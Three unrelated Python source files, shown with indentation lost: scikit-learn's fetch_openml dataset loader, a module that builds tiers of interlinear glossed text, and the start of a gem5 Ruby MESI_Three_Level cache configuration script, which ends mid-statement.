def _feature_to_dtype(feature: Dict[str, str]):
"""Map feature to dtype for pandas DataFrame"""
if feature["data_type"] == "string":
return object
elif feature["data_type"] == "nominal":
return "category"
# only numeric, integer, real are left
elif feature["number_of_missing_values"] != "0" or feature["data_type"] in [
"numeric",
"real",
]:
# cast to floats when there are any missing values
return np.float64
elif feature["data_type"] == "integer":
return np.int64
raise ValueError("Unsupported feature: {}".format(feature))
def _convert_arff_data_dataframe(
arff: ArffContainerType, columns: List, features_dict: Dict[str, Any]
) -> Tuple:
"""Convert the ARFF object into a pandas DataFrame.
Parameters
----------
arff : dict
As obtained from liac-arff object.
columns : list
Columns from dataframe to return.
features_dict : dict
Maps feature name to feature info from openml.
Returns
-------
result : tuple
tuple with the resulting dataframe
"""
pd = check_pandas_support("fetch_openml with as_frame=True")
attributes = OrderedDict(arff["attributes"])
arff_columns = list(attributes)
if not isinstance(arff["data"], Generator):
raise ValueError(
"arff['data'] must be a generator when converting to pd.DataFrame."
)
# calculate chunksize
first_row = next(arff["data"])
first_df = pd.DataFrame([first_row], columns=arff_columns)
row_bytes = first_df.memory_usage(deep=True).sum()
chunksize = get_chunk_n_rows(row_bytes)
# read arff data with chunks
columns_to_keep = [col for col in arff_columns if col in columns]
dfs = []
dfs.append(first_df[columns_to_keep])
for data in _chunk_generator(arff["data"], chunksize):
dfs.append(pd.DataFrame(data, columns=arff_columns)[columns_to_keep])
df = pd.concat(dfs, ignore_index=True)
for column in columns_to_keep:
dtype = _feature_to_dtype(features_dict[column])
if dtype == "category":
cats_without_missing = [
cat
for cat in attributes[column]
if cat is not None and not is_scalar_nan(cat)
]
dtype = pd.api.types.CategoricalDtype(cats_without_missing)
df[column] = df[column].astype(dtype, copy=False)
return (df,)
def _get_data_info_by_name(
name: str, version: Union[int, str], data_home: Optional[str]
):
"""
Utilizes the openml dataset listing api to find a dataset by
name/version
OpenML api function:
https://www.openml.org/api_docs#!/data/get_data_list_data_name_data_name
Parameters
----------
name : str
name of the dataset
version : int or str
If version is an integer, the exact name/version will be obtained from
OpenML. If version is a string (value: "active") it will take the first
version from OpenML that is annotated as active. Any other string
values except "active" are treated as integer.
data_home : str or None
Location to cache the response. None if no cache is required.
Returns
-------
first_dataset : json
        json representation of the first dataset object that adhered to the
search criteria
"""
if version == "active":
# situation in which we return the oldest active version
url = _SEARCH_NAME.format(name) + "/status/active/"
error_msg = "No active dataset {} found.".format(name)
json_data = _get_json_content_from_openml_api(
url, error_msg, data_home=data_home
)
res = json_data["data"]["dataset"]
if len(res) > 1:
warn(
"Multiple active versions of the dataset matching the name"
" {name} exist. Versions may be fundamentally different, "
"returning version"
" {version}.".format(name=name, version=res[0]["version"])
)
return res[0]
# an integer version has been provided
url = (_SEARCH_NAME + "/data_version/{}").format(name, version)
try:
json_data = _get_json_content_from_openml_api(
url, error_message=None, data_home=data_home
)
except OpenMLError:
# we can do this in 1 function call if OpenML does not require the
# specification of the dataset status (i.e., return datasets with a
# given name / version regardless of active, deactivated, etc. )
# TODO: feature request OpenML.
url += "/status/deactivated"
error_msg = "Dataset {} with version {} not found.".format(name, version)
json_data = _get_json_content_from_openml_api(
url, error_msg, data_home=data_home
)
return json_data["data"]["dataset"][0]
def _get_data_description_by_id(
data_id: int, data_home: Optional[str]
) -> Dict[str, Any]:
# OpenML API function: https://www.openml.org/api_docs#!/data/get_data_id
url = _DATA_INFO.format(data_id)
error_message = "Dataset with data_id {} not found.".format(data_id)
json_data = _get_json_content_from_openml_api(
url, error_message, data_home=data_home
)
return json_data["data_set_description"]
def _get_data_features(data_id: int, data_home: Optional[str]) -> OpenmlFeaturesType:
# OpenML function:
# https://www.openml.org/api_docs#!/data/get_data_features_id
url = _DATA_FEATURES.format(data_id)
error_message = "Dataset with data_id {} not found.".format(data_id)
json_data = _get_json_content_from_openml_api(
url, error_message, data_home=data_home
)
return json_data["data_features"]["feature"]
def _get_data_qualities(data_id: int, data_home: Optional[str]) -> OpenmlQualitiesType:
# OpenML API function:
# https://www.openml.org/api_docs#!/data/get_data_qualities_id
url = _DATA_QUALITIES.format(data_id)
error_message = "Dataset with data_id {} not found.".format(data_id)
json_data = _get_json_content_from_openml_api(
url, error_message, data_home=data_home
)
# the qualities might not be available, but we still try to process
# the data
return json_data.get("data_qualities", {}).get("quality", [])
def _get_num_samples(data_qualities: OpenmlQualitiesType) -> int:
"""Get the number of samples from data qualities.
Parameters
----------
data_qualities : list of dict
Used to retrieve the number of instances (samples) in the dataset.
Returns
-------
n_samples : int
The number of samples in the dataset or -1 if data qualities are
unavailable.
"""
# If the data qualities are unavailable, we return -1
default_n_samples = -1
qualities = {d["name"]: d["value"] for d in data_qualities}
return int(float(qualities.get("NumberOfInstances", default_n_samples)))
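# For example, qualities containing {"name": "NumberOfInstances",
# "value": "150.0"} yield 150; if the qualities list is empty, -1 is returned.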
def _load_arff_response(
url: str,
data_home: Optional[str],
return_type,
encode_nominal: bool,
parse_arff: Callable[[ArffContainerType], Tuple],
md5_checksum: str,
) -> Tuple:
"""Load arff data with url and parses arff response with parse_arff"""
response = _open_openml_url(url, data_home)
with closing(response):
# Note that if the data is dense, no reading is done until the data
# generator is iterated.
actual_md5_checksum = hashlib.md5()
def _stream_checksum_generator(response):
for line in response:
actual_md5_checksum.update(line)
yield line.decode("utf-8")
stream = _stream_checksum_generator(response)
arff = _arff.load(
stream, return_type=return_type, encode_nominal=encode_nominal
)
parsed_arff = parse_arff(arff)
# consume remaining stream, if early exited
for _ in stream:
pass
if actual_md5_checksum.hexdigest() != md5_checksum:
raise ValueError(
"md5 checksum of local file for "
+ url
+ " does not match description. "
"Downloaded file could have been modified / "
"corrupted, clean cache and retry..."
)
return parsed_arff
def _download_data_to_bunch(
url: str,
sparse: bool,
data_home: Optional[str],
*,
as_frame: bool,
features_list: List,
data_columns: List[int],
target_columns: List,
shape: Optional[Tuple[int, int]],
md5_checksum: str,
):
"""Download OpenML ARFF and convert to Bunch of data"""
# NB: this function is long in order to handle retry for any failure
# during the streaming parse of the ARFF.
# Prepare which columns and data types should be returned for the X and y
features_dict = {feature["name"]: feature for feature in features_list}
# XXX: col_slice_y should be all nominal or all numeric
_verify_target_data_type(features_dict, target_columns)
col_slice_y = [int(features_dict[col_name]["index"]) for col_name in target_columns]
col_slice_x = [int(features_dict[col_name]["index"]) for col_name in data_columns]
for col_idx in col_slice_y:
feat = features_list[col_idx]
nr_missing = int(feat["number_of_missing_values"])
if nr_missing > 0:
raise ValueError(
"Target column {} has {} missing values. "
"Missing values are not supported for target "
"columns. ".format(feat["name"], nr_missing)
)
# Access an ARFF file on the OpenML server. Documentation:
# https://www.openml.org/api_data_docs#!/data/get_download_id
if sparse is True:
return_type = _arff.COO
else:
return_type = _arff.DENSE_GEN
frame = nominal_attributes = None
parse_arff: Callable
postprocess: Callable
if as_frame:
columns = data_columns + target_columns
parse_arff = partial(
_convert_arff_data_dataframe, columns=columns, features_dict=features_dict
)
def postprocess(frame):
X = frame[data_columns]
if len(target_columns) >= 2:
y = frame[target_columns]
elif len(target_columns) == 1:
y = frame[target_columns[0]]
else:
y = None
return X, y, frame, nominal_attributes
else:
def parse_arff(arff):
X, y = _convert_arff_data(arff, col_slice_x, col_slice_y, shape)
# nominal attributes is a dict mapping from the attribute name to
# the possible values. Includes also the target column (which will
# be popped off below, before it will be packed in the Bunch
# object)
nominal_attributes = {
k: v
for k, v in arff["attributes"]
if isinstance(v, list) and k in data_columns + target_columns
}
return X, y, nominal_attributes
def postprocess(X, y, nominal_attributes):
is_classification = {
col_name in nominal_attributes for col_name in target_columns
}
if not is_classification:
# No target
pass
elif all(is_classification):
y = np.hstack(
[
np.take(
np.asarray(nominal_attributes.pop(col_name), dtype="O"),
y[:, i : i + 1].astype(int, copy=False),
)
for i, col_name in enumerate(target_columns)
]
)
elif any(is_classification):
raise ValueError(
"Mix of nominal and non-nominal targets is not currently supported"
)
# reshape y back to 1-D array, if there is only 1 target column;
            # back to None if there are no target columns
if y.shape[1] == 1:
y = y.reshape((-1,))
elif y.shape[1] == 0:
y = None
return X, y, frame, nominal_attributes
out = _retry_with_clean_cache(url, data_home)(_load_arff_response)(
url,
data_home,
return_type=return_type,
encode_nominal=not as_frame,
parse_arff=parse_arff,
md5_checksum=md5_checksum,
)
X, y, frame, nominal_attributes = postprocess(*out)
return Bunch(
data=X,
target=y,
frame=frame,
categories=nominal_attributes,
feature_names=data_columns,
target_names=target_columns,
)
def _verify_target_data_type(features_dict, target_columns):
# verifies the data type of the y array in case there are multiple targets
# (throws an error if these targets do not comply with sklearn support)
if not isinstance(target_columns, list):
raise ValueError("target_column should be list, got: %s" % type(target_columns))
found_types = set()
for target_column in target_columns:
if target_column not in features_dict:
            raise KeyError("Could not find target_column={}".format(target_column))
if features_dict[target_column]["data_type"] == "numeric":
found_types.add(np.float64)
else:
found_types.add(object)
# note: we compare to a string, not boolean
if features_dict[target_column]["is_ignore"] == "true":
warn("target_column={} has flag is_ignore.".format(target_column))
if features_dict[target_column]["is_row_identifier"] == "true":
warn("target_column={} has flag is_row_identifier.".format(target_column))
if len(found_types) > 1:
raise ValueError(
"Can only handle homogeneous multi-target datasets, "
"i.e., all targets are either numeric or "
"categorical."
)
def _valid_data_column_names(features_list, target_columns):
# logic for determining on which columns can be learned. Note that from the
# OpenML guide follows that columns that have the `is_row_identifier` or
# `is_ignore` flag, these can not be learned on. Also target columns are
# excluded.
valid_data_column_names = []
for feature in features_list:
if (
feature["name"] not in target_columns
and feature["is_ignore"] != "true"
and feature["is_row_identifier"] != "true"
):
valid_data_column_names.append(feature["name"])
return valid_data_column_names
def fetch_openml(
name: Optional[str] = None,
*,
version: Union[str, int] = "active",
data_id: Optional[int] = None,
data_home: Optional[str] = None,
target_column: Optional[Union[str, List]] = "default-target",
cache: bool = True,
return_X_y: bool = False,
as_frame: Union[str, bool] = "auto",
):
"""Fetch dataset from openml by name or dataset id.
Datasets are uniquely identified by either an integer ID or by a
combination of name and version (i.e. there might be multiple
versions of the 'iris' dataset). Please give either name or data_id
(not both). In case a name is given, a version can also be
provided.
Read more in the :ref:`User Guide <openml>`.
.. versionadded:: 0.20
.. note:: EXPERIMENTAL
The API is experimental (particularly the return value structure),
and might have small backward-incompatible changes without notice
or warning in future releases.
Parameters
----------
name : str, default=None
String identifier of the dataset. Note that OpenML can have multiple
datasets with the same name.
version : int or 'active', default='active'
Version of the dataset. Can only be provided if also ``name`` is given.
If 'active' the oldest version that's still active is used. Since
there may be more than one active version of a dataset, and those
versions may fundamentally be different from one another, setting an
exact version is highly recommended.
data_id : int, default=None
OpenML ID of the dataset. The most specific way of retrieving a
dataset. If data_id is not given, name (and potential version) are
used to obtain a dataset.
data_home : str, default=None
Specify another download and cache folder for the data sets. By default
all scikit-learn data is stored in '~/scikit_learn_data' subfolders.
target_column : str, list or None, default='default-target'
Specify the column name in the data to use as target. If
        'default-target', the standard target column as stored on the server
is used. If ``None``, all columns are returned as data and the
target is ``None``. If list (of strings), all columns with these names
are returned as multi-target (Note: not all scikit-learn classifiers
can handle all types of multi-output combinations)
cache : bool, default=True
Whether to cache downloaded datasets using joblib.
return_X_y : bool, default=False
If True, returns ``(data, target)`` instead of a Bunch object. See
below for more information about the `data` and `target` objects.
as_frame : bool or 'auto', default='auto'
If True, the data is a pandas DataFrame including columns with
appropriate dtypes (numeric, string or categorical). The target is
a pandas DataFrame or Series depending on the number of target_columns.
The Bunch will contain a ``frame`` attribute with the target and the
data. If ``return_X_y`` is True, then ``(data, target)`` will be pandas
        DataFrames or Series as described above.
If as_frame is 'auto', the data and target will be converted to
DataFrame or Series as if as_frame is set to True, unless the dataset
is stored in sparse format.
.. versionchanged:: 0.24
The default value of `as_frame` changed from `False` to `'auto'`
in 0.24.
Returns
-------
data : :class:`~sklearn.utils.Bunch`
Dictionary-like object, with the following attributes.
data : np.array, scipy.sparse.csr_matrix of floats, or pandas DataFrame
The feature matrix. Categorical features are encoded as ordinals.
target : np.array, pandas Series or DataFrame
The regression target or classification labels, if applicable.
Dtype is float if numeric, and object if categorical. If
``as_frame`` is True, ``target`` is a pandas object.
DESCR : str
The full description of the dataset
feature_names : list
The names of the dataset columns
target_names: list
The names of the target columns
.. versionadded:: 0.22
categories : dict or None
Maps each categorical feature name to a list of values, such
that the value encoded as i is ith in the list. If ``as_frame``
is True, this is None.
details : dict
More metadata from OpenML
frame : pandas DataFrame
Only present when `as_frame=True`. DataFrame with ``data`` and
``target``.
(data, target) : tuple if ``return_X_y`` is True
.. note:: EXPERIMENTAL
This interface is **experimental** and subsequent releases may
change attributes without notice (although there should only be
minor changes to ``data`` and ``target``).
Missing values in the 'data' are represented as NaN's. Missing values
in 'target' are represented as NaN's (numerical target) or None
(categorical target)
"""
if cache is False:
# no caching will be applied
data_home = None
else:
data_home = get_data_home(data_home=data_home)
data_home = join(data_home, "openml")
# check valid function arguments. data_id XOR (name, version) should be
# provided
if name is not None:
# OpenML is case-insensitive, but the caching mechanism is not
# convert all data names (str) to lower case
name = name.lower()
if data_id is not None:
raise ValueError(
"Dataset data_id={} and name={} passed, but you can only "
"specify a numeric data_id or a name, not "
"both.".format(data_id, name)
)
data_info = _get_data_info_by_name(name, version, data_home)
data_id = data_info["did"]
elif data_id is not None:
# from the previous if statement, it is given that name is None
if version != "active":
raise ValueError(
"Dataset data_id={} and version={} passed, but you can only "
"specify a numeric data_id or a version, not "
"both.".format(data_id, version)
)
else:
raise ValueError(
"Neither name nor data_id are provided. Please provide name or data_id."
)
data_description = _get_data_description_by_id(data_id, data_home)
if data_description["status"] != "active":
warn(
"Version {} of dataset {} is inactive, meaning that issues have "
"been found in the dataset. Try using a newer version from "
"this URL: {}".format(
data_description["version"],
data_description["name"],
data_description["url"],
)
)
if "error" in data_description:
warn(
"OpenML registered a problem with the dataset. It might be "
"unusable. Error: {}".format(data_description["error"])
)
if "warning" in data_description:
warn(
"OpenML raised a warning on the dataset. It might be "
"unusable. Warning: {}".format(data_description["warning"])
)
return_sparse = False
if data_description["format"].lower() == "sparse_arff":
return_sparse = True
if as_frame == "auto":
as_frame = not return_sparse
if as_frame and return_sparse:
raise ValueError("Cannot return dataframe with sparse data")
# download data features, meta-info about column types
features_list = _get_data_features(data_id, data_home)
if not as_frame:
for feature in features_list:
if "true" in (feature["is_ignore"], feature["is_row_identifier"]):
continue
if feature["data_type"] == "string":
raise ValueError(
"STRING attributes are not supported for "
"array representation. Try as_frame=True"
)
if target_column == "default-target":
# determines the default target based on the data feature results
# (which is currently more reliable than the data description;
# see issue: https://github.com/openml/OpenML/issues/768)
target_columns = [
feature["name"]
for feature in features_list
if feature["is_target"] == "true"
]
elif isinstance(target_column, str):
# for code-simplicity, make target_column by default a list
target_columns = [target_column]
elif target_column is None:
target_columns = []
elif isinstance(target_column, list):
target_columns = target_column
else:
raise TypeError(
"Did not recognize type of target_column"
"Should be str, list or None. Got: "
"{}".format(type(target_column))
)
data_columns = _valid_data_column_names(features_list, target_columns)
shape: Optional[Tuple[int, int]]
# determine arff encoding to return
if not return_sparse:
# The shape must include the ignored features to keep the right indexes
# during the arff data conversion.
data_qualities = _get_data_qualities(data_id, data_home)
shape = _get_num_samples(data_qualities), len(features_list)
else:
shape = None
# obtain the data
url = _DATA_FILE.format(data_description["file_id"])
bunch = _download_data_to_bunch(
url,
return_sparse,
data_home,
as_frame=bool(as_frame),
features_list=features_list,
shape=shape,
target_columns=target_columns,
data_columns=data_columns,
md5_checksum=data_description["md5_checksum"],
)
if return_X_y:
return bunch.data, bunch.target
description = "{}\n\nDownloaded from openml.org.".format(
data_description.pop("description")
)
bunch.update(
DESCR=description,
details=data_description,
url="https://www.openml.org/d/{}".format(data_id),
)
return bunch
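# A minimal usage sketch (dataset identifiers are illustrative and require
# network access):
#
#   bunch = fetch_openml(name="iris", version=1, as_frame=True)
#   X, y = bunch.data, bunch.target          # DataFrame / Series
#   X2, y2 = fetch_openml(data_id=61, return_X_y=True, as_frame=False)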
|
|
import logging
from intent.igt.consts import ODIN_JUDGMENT_ATTRIBUTE
from intent.igt.igtutils import rgencode, get_judgment, extract_judgment
from unittest import TestCase
from intent.igt.igtutils import strip_leading_whitespace
from intent.igt.search import normalized_tier, cleaned_tier
from intent.utils.dicts import DefaultOrderedDict
import xigt.xigtpath as xp
from xigt.consts import ALIGNMENT
CREATE_LOG = logging.getLogger("IGT_CREATION")
# -------------------------------------------
# Add
# -------------------------------------------
def create_text_tier_from_lines(inst, lines, id_base, state):
"""
Given a list of lines that are dicts with the attributes 'text' and 'tag', create
a text tier of the specified type with the provided line items.
:type lines: list[dict]
"""
# -------------------------------------------
# 1) Generate the parent tier.
tier = RGTier(id=gen_tier_id(inst, id_base), type=ODIN_TYPE, attributes={STATE_ATTRIBUTE:state})
# -------------------------------------------
# 2) Iterate over the list of lines
for line in lines:
# Make sure the line is a dict.
if not hasattr(line, 'get') or 'text' not in line or 'tag' not in line:
raise RGXigtException("When constructing tier from lines, must be a list of dicts with keys 'text' and 'tag'.")
# Construct the list of tags.
alltags = []
if line.get('tag') is not None:
alltags.append(line.get('tag'))
if line.get('labels') is not None and line.get('labels'):
alltags.append(line.get('labels'))
tag_str = '+'.join(alltags)
# Construct the attributes
line_attributes = {ODIN_TAG_ATTRIBUTE:tag_str}
if line.get('judgment') is not None:
line_attributes[ODIN_JUDGMENT_ATTRIBUTE] = line['judgment']
l = RGItem(id=gen_item_id(tier.id, len(tier)),
attributes=line_attributes,
text=line.get('text'))
tier.append(l)
return tier
def add_text_tier_from_lines(inst, lines, id_base, state):
tier = create_text_tier_from_lines(inst, lines, id_base, state)
inst.append(tier)
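# A sketch of the expected `lines` payload (values are illustrative):
#
#   lines = [{'tag': 'L', 'text': 'ninakula'},
#            {'tag': 'G', 'text': '1SG-eat'},
#            {'tag': 'T', 'text': 'I am eating'}]
#   add_text_tier_from_lines(inst, lines, CLEAN_ID, CLEAN_STATE)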
# -------------------------------------------
#
# -------------------------------------------
def add_normal_line_to_tier(inst, tier, tag, func):
clean_tier = get_clean_tier(inst)
clean_lines = [l for l in clean_tier if tag in l.attributes[ODIN_TAG_ATTRIBUTE].split('+')]
if len(clean_lines) > 1:
PARSELOG.warning(rgencode(clean_tier))
raise XigtFormatException("Clean tier should not have multiple lines of same tag.")
# If there are clean lines for this tag... There must be only 1...
# create it and add it to the tier.
elif clean_lines:
attributes = {ODIN_TAG_ATTRIBUTE:clean_lines[0].attributes[ODIN_TAG_ATTRIBUTE]}
cl = clean_lines[0]
text = None if cl.value() is None else func(cl.value())
text, j = (None, None) if text is None else extract_judgment(text)
# -------------------------------------------
# Several options for the judgment attribute...
# -------------------------------------------
# 1) It was previously there on the clean tier.
# in this case, carry it over to the normalized
# tier.
line_judgment = cl.attributes.get(ODIN_JUDGMENT_ATTRIBUTE)
if line_judgment is not None:
attributes[ODIN_JUDGMENT_ATTRIBUTE] = line_judgment
# -------------------------------------------
# 2) After being cleaned, there is still a judgment
# character on the line. Extract it and add
# the appropriate attribute.
elif text is not None and j is not None:
attributes[ODIN_JUDGMENT_ATTRIBUTE] = j
item = RGLine(id=gen_item_id(tier.id, len(tier)),
text=func(text),
alignment=clean_lines[0].id,
attributes=attributes)
tier.add(item)
def from_raw_text(string, corpus=None, idnum=None):
"""
Method to create an IGT instance from a raw three lines of text, assuming L-G-T.
:param string:
:param corpus:
:param idnum:
"""
lines = string.split('\n')
if len(lines) < 3:
raise RawTextParseError("Three lines are assumed for raw text. Instead got {}".format(len(lines)))
if idnum is not None:
id = gen_item_id('i', idnum)
elif corpus:
id = corpus.askIgtId()
else:
corpus = RGCorpus()
id = corpus.askIgtId()
inst = RGIgt(id = id)
rt = RGLineTier(id = RAW_ID, type=ODIN_TYPE, attributes={STATE_ATTRIBUTE:RAW_STATE}, igt=inst)
for i, l in enumerate(lines):
# If we have four lines, assume that the first is
# native orthography
if len(lines) == 4:
if i == 0:
linetag = ODIN_LANG_TAG + '+FR'
if i == 1:
linetag = ODIN_LANG_TAG
if i == 2:
linetag = ODIN_GLOSS_TAG
if i == 3:
linetag = ODIN_TRANS_TAG
elif len(lines) == 3:
if i == 0:
linetag = ODIN_LANG_TAG
elif i == 1:
linetag = ODIN_GLOSS_TAG
elif i == 2:
linetag = ODIN_TRANS_TAG
elif len(lines) == 2:
if i == 0:
linetag = ODIN_LANG_TAG
if i == 1:
linetag = ODIN_TRANS_TAG
else:
raise RawTextParseError("Unknown number of lines...")
if not l.strip():
raise RawTextParseError("The {} line is empty: {}".format(linetag, l))
li = RGLine(id=rt.askItemId(), text=l, attributes={'tag':linetag})
rt.append(li)
inst.append(rt)
try:
inst.basic_processing()
except GlossLangAlignException as glae:
CONVERT_LOG.warn('Gloss and language lines could not be automatically aligned for instance "{}".'.format(inst.id))
# CONVERT_LOG.warn("Basic processing failed for instance {}".format(inst.id))
return inst
# -------------------------------------------
def get_raw_tier(inst):
"""
Retrieve the raw ODIN tier, otherwise raise an exception.
"""
rt = raw_tier(inst)
if not rt:
raise NoODINRawException('No raw tier found.')
else:
return rt
def get_normal_tier(inst, clean=True, generate=True, force_generate=False):
"""
:param inst: The instance to retrieve the normal tier from.
:param clean: Whether to attempt to automatically clean the instance or not.
:type clean: bool
:param generate: Whether to generate the normalized line if it doesn't exist.
:type generate: bool
:param force_generate: If the normal line already exists, overwrite it?
:type force_generate: bool
:return:
"""
# If a normal tier already exists, return it.
normal_tier = find_in_obj(inst, type=ODIN_TYPE, attributes={STATE_ATTRIBUTE:NORM_STATE})
# Otherwise, create a new one, with only L, G and T lines.
if force_generate or (normal_tier is None and generate):
if normal_tier is not None:
inst.remove(normal_tier)
normal_tier = RGLineTier(id = NORM_ID, type=ODIN_TYPE,
attributes={STATE_ATTRIBUTE:NORM_STATE, ALIGNMENT:get_clean_tier(inst).id})
# Get one item per...
add_normal_line_to_tier(inst, normal_tier, ODIN_LANG_TAG, clean_lang_string if clean else lambda x: x)
add_normal_line_to_tier(inst, normal_tier, ODIN_GLOSS_TAG, clean_gloss_string if clean else lambda x: x)
add_normal_line_to_tier(inst, normal_tier, ODIN_TRANS_TAG, clean_trans_string if clean else lambda x: x)
# -------------------------------------------
# Now, remove the whitespace shared between lines.
# -------------------------------------------
textlines = strip_leading_whitespace([i.text for i in normal_tier])
for textline, item in zip(textlines, normal_tier):
item.text = textline
inst.append(normal_tier)
return normal_tier
elif normal_tier is not None:
return normal_tier
else:
return None
def get_clean_tier(inst, merge=False, generate=True, force_generate=False):
"""
If the clean odin tier exists, return it. Otherwise, create it.
"""
# -------------------------------------------
# Search for the clean tier
# -------------------------------------------
clean_tier = find_in_obj(inst, type=ODIN_TYPE, attributes={STATE_ATTRIBUTE:CLEAN_STATE})
# Remove the clean tier if we are regenerating.
if clean_tier is not None and force_generate:
inst.remove(clean_tier)
# -------------------------------------------
# If we want to force regenerate the tier, or
# it is not found and we want to generate it
# freshly.
# -------------------------------------------
if force_generate or ((clean_tier is None) and generate):
# Otherwise, we will make our own:
raw_tier = get_raw_tier(inst)
# Initialize the clean tier...
clean_tier = RGLineTier(id = CLEAN_ID, type=ODIN_TYPE,
attributes={STATE_ATTRIBUTE:CLEAN_STATE,
ALIGNMENT:raw_tier.id})
# Gather the different tags used in this tier.
# Note that we don't want to discard non-L,G,T tiers yet.
line_tags = DefaultOrderedDict(list)
for l in raw_tier:
            tags = l.attributes['tag'].split('+')
            primary = tags[0]
            line_tags[primary].append(l)
# Now, the line_tags should be indexed by the primary
# tag (L, G, T, etc...) with the +'s after it...
# Now, go through and merge if needed.
for primary_tag in line_tags.keys():
lines = line_tags[primary_tag]
# If there is only one line for the given tag,
# simply return the first line.
if len(lines) == 1:
text = lines[0].value()
new_tag = lines[0].attributes[ODIN_TAG_ATTRIBUTE]
align_id = lines[0].id
item_judgment = lines[0].attributes.get(ODIN_JUDGMENT_ATTRIBUTE)
# If there are multiple lines for a given tag,
# concatenate them to a single line.
elif len(lines) > 1:
PARSELOG.info('Corruption detected in instance %s: %s' % (inst.id, [l.attributes['tag'] for l in lines]))
for l in lines:
PARSELOG.debug('BEFORE: %s' % l)
# The new text should be the concatenation of the multiple lines...
text = concat_lines([l.value() for l in lines if l.value() is not None])
PARSELOG.debug('AFTER: %s' % text)
new_tag = primary_tag
align_id = ','.join([l.id for l in lines])
item_judgment = None
for l in lines:
j = l.attributes.get(ODIN_JUDGMENT_ATTRIBUTE)
if j is not None:
item_judgment = j
break
# Set up the attributes for the new line
item_attributes = {ODIN_TAG_ATTRIBUTE: new_tag}
# If we have a judgment, add it to the attributes.
# Otherwise, don't add it.
if item_judgment is not None:
item_attributes[ODIN_JUDGMENT_ATTRIBUTE] = item_judgment
item = RGLine(id=clean_tier.askItemId(),
alignment=align_id, text=text,
attributes=item_attributes)
clean_tier.add(item)
inst.append(clean_tier)
return clean_tier
# -------------------------------------------
# Finally, if the tier exists
# -------------------------------------------
elif clean_tier is not None:
return clean_tier
# -------------------------------------------
# Otherwise, just return None
# -------------------------------------------
else:
return None
def replace_lines(inst, clean_lines, norm_lines):
"""
Given an instance and a list of clean lines and normal lines,
add a cleaned tier and normalized if they do not already exist,
otherwise, replace them.
:param inst:
:type inst: xigt.Igt
:param clean_lines:
:type clean_lines: list[dict]
:param norm_lines:
:type norm_lines: list[dict]
"""
# -------------------------------------------
# Remove the old clean/norm lines.
# -------------------------------------------
old_clean_tier = cleaned_tier(inst)
if old_clean_tier is not None:
inst.remove(old_clean_tier)
old_norm_tier = normalized_tier(inst)
if old_norm_tier is not None:
inst.remove(old_norm_tier)
# -------------------------------------------
# Now, add the clean/norm lines, if provided.
# -------------------------------------------
if clean_lines:
new_clean_tier = create_text_tier_from_lines(inst, clean_lines, CLEAN_ID, CLEAN_STATE)
inst.append(new_clean_tier)
if norm_lines:
new_norm_tier = create_text_tier_from_lines(inst, norm_lines, NORM_ID, NORM_STATE)
inst.append(new_norm_tier)
return inst
from .consts import RAW_ID, ODIN_TYPE, STATE_ATTRIBUTE, RAW_STATE, ODIN_LANG_TAG, ODIN_GLOSS_TAG, \
ODIN_TRANS_TAG, ODIN_TAG_ATTRIBUTE
from .rgxigt import RGCorpus, RGIgt, RGLineTier, RGLine, CONVERT_LOG, RGTier, gen_tier_id, RGItem, PARSELOG, \
gen_item_id
from .exceptions import GlossLangAlignException, RawTextParseError, RGXigtException, XigtFormatException
from .search import find_in_obj, raw_tier
from .consts import *
from .igtutils import merge_lines, clean_lang_string, clean_gloss_string, clean_trans_string, concat_lines
from .rgxigt import RGLineTier, PARSELOG, RGLine, RGTier, NoODINRawException
from .creation import *
|
|
# Copyright (c) 2006-2007 The Regents of The University of Michigan
# Copyright (c) 2009,2015 Advanced Micro Devices, Inc.
# Copyright (c) 2013 Mark D. Hill and David A. Wood
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met: redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer;
# redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution;
# neither the name of the copyright holders nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
# Authors: Brad Beckmann
# Nilay Vaish
import math
import m5
from m5.objects import *
from m5.defines import buildEnv
from Ruby import create_topology, create_directories
from Ruby import send_evicts
#
# Declare caches used by the protocol
#
class L0Cache(RubyCache): pass
class L1Cache(RubyCache): pass
class L2Cache(RubyCache): pass
def define_options(parser):
parser.add_option("--num-clusters", type = "int", default = 1,
help = "number of clusters in a design in which there are shared "
"caches private to clusters")
return
def create_system(options, full_system, system, dma_ports, ruby_system):
if buildEnv['PROTOCOL'] != 'MESI_Three_Level':
fatal("This script requires the MESI_Three_Level protocol to be\
built.")
cpu_sequencers = []
#
# The ruby network creation expects the list of nodes in the system to be
# consistent with the NetDest list. Therefore the l1 controller nodes
# must be listed before the directory nodes and directory nodes before
# dma nodes, etc.
#
l0_cntrl_nodes = []
l1_cntrl_nodes = []
l2_cntrl_nodes = []
dma_cntrl_nodes = []
assert (options.num_cpus % options.num_clusters == 0)
num_cpus_per_cluster = options.num_cpus / options.num_clusters
assert (options.num_l2caches % options.num_clusters == 0)
num_l2caches_per_cluster = options.num_l2caches / options.num_clusters
l2_bits = int(math.log(num_l2caches_per_cluster, 2))
block_size_bits = int(math.log(options.cacheline_size, 2))
l2_index_start = block_size_bits + l2_bits
#
# Must create the individual controllers before the network to ensure the
# controller constructors are called before the network constructor
#
for i in xrange(options.num_clusters):
for j in xrange(num_cpus_per_cluster):
#
# First create the Ruby objects associated with this cpu
#
l0i_cache = L0Cache(size = '4096B', assoc = 1, is_icache = True,
start_index_bit = block_size_bits,
